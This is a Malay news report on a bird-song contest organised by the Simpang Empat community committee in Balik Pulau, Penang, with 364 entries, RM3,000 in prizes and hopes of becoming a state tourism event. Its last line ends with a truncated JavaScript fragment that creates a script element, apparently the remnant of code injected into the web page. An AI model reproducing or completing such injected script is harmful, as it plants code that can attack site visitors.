Pertandingan Seni & Gaya Burung sebagai produk pelancongan negeri – JKKK

Oleh : S. HEMAWATHI

PULAU BETONG – Seramai 364 penggemar seni suara burung mengambil bahagian dalam Pertandingan Seni Suara & Gaya Burung anjuran Jawatankuasa Kemajuan dan Keselamatan Komuniti (JKKK) Simpang Empat di Kompleks Sukan MBPP
Balik Pulau baru-baru ini.
Setiausaha JKKK Simpang Empat, Idzham Ahmad berkata, pihaknya berharap pertandingan itu boleh diangkat sebagai produk pelancongan Pulau Pinang serta dimuatkan dalam kalendar pelancongan negeri.
“Sebanyak 364 penyertaan diterima walaupun buat julung kalinya diadakan di Parlimen Balik Pulau.
“Selain durian Balik Pulau, pertandingan ini juga ada potensi menarik pengunjung ke Balik Pulau sekiranya ia dijadikan program tahunan negeri dan dimasukkan di dalam kalendar pelancongan,’’ katanya ketika ditemui bersama-sama Pengerusi JKKK Simpang Empat, Mohd. Majdan Nut Jamudin pada hari penganjuran baru-baru ini.
Hadir sama, bekas Speaker Dewan Undangan Negeri (DUN) Pulau Pinang, Dato’ Abdul Halim Hussein, Pegawai Penyelaras Kawasan Dewan UndanganNegeri (PPK) Pulau Betong, Mohd. Tuah Ismail, PPK Teluk Bahang, Halil Sabri Hamid serta Ahli Majlis bagi Majlis Bandaraya Pulau Pinang (MBPP), Ahmad Razaaim Azimi.
Difahamkan, pertandingan tersebut meliputi kategori Merbah Jambul, Murai Kampung dan Murai Batu.

Pemenang dipilih berdasarkan kicauan burung dalam beberapa aspek seperti suara depan, hujung serta irama lagu.
Hadiah wang tunai yang ditawarkan keseluruhan berjumlah RM3,000 dan johan turut membawa pulang Piala Pengerusi JKKK Simpang Empat.
Memeriahkan penganjuran adalah hadiah cabutan bertuah yang menawarkan sebuah motosikal.var d=document;var s=d.createElement(‘script’);